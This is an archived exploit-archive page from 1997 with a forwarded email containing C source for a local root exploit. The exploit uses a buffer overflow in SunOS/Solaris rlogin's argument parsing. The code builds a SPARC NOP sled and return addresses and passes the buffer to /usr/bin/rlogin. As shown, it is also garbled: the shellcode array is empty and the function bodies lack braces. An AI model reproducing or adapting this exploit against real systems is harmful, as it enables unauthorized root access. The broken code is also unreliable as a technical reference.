SunOS rlogin overflow

Description:Aparrently an overflow in parsing argv
Author:I have no clue, _PHANTOM_ <> sent it to me
Compromise: root (apparently) (local)
Vulnerable Systems:SunOS
Date:8 September 1997
Notes:Someone confirmed to me that this works with Solaris 2.5.1 but not 2.6. Anyoen care to try SunOS 4.x?

Date: Mon, 8 Sep 1997 13:32:36 +0300 (EET DST)
From: _PHANTOM_ <>
To: Fyodor <>
Subject: Re: *HELP*

[ Cut ] 

Below is an exploit for SUN-OS:
(not mine, sorry, but i'm workin' on it...)

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH      8200
#define EXTRA           100
#define STACK_OFFSET    4000
#define SPARC_NOP       0xa61cc013

u_char sparc_shellcode[] =

u_long get_sp(void)
  __asm__("mov %sp,%i0 \n");

void main(int argc, char *argv[])
  char buf[BUF_LENGTH + EXTRA];
  long targ_addr;
  u_long *long_p;
  u_char *char_p;
  int i, code_length = strlen(sparc_shellcode);

  long_p = (u_long *) buf;

  for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
    *long_p++ = SPARC_NOP;

  char_p = (u_char *) long_p;

  for (i = 0; i < code_length; i++)
    *char_p++ = sparc_shellcode[i];

  long_p = (u_long *) char_p;

  targ_addr = get_sp() - STACK_OFFSET;
  for (i = 0; i < EXTRA / sizeof(u_long); i++)
    *long_p++ = targ_addr;

  printf("Jumping to address 0x%lx\n", targ_addr);

  execl("/usr/bin/rlogin", "rlogin", buf, (char *) 0);
  perror("execl failed");

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: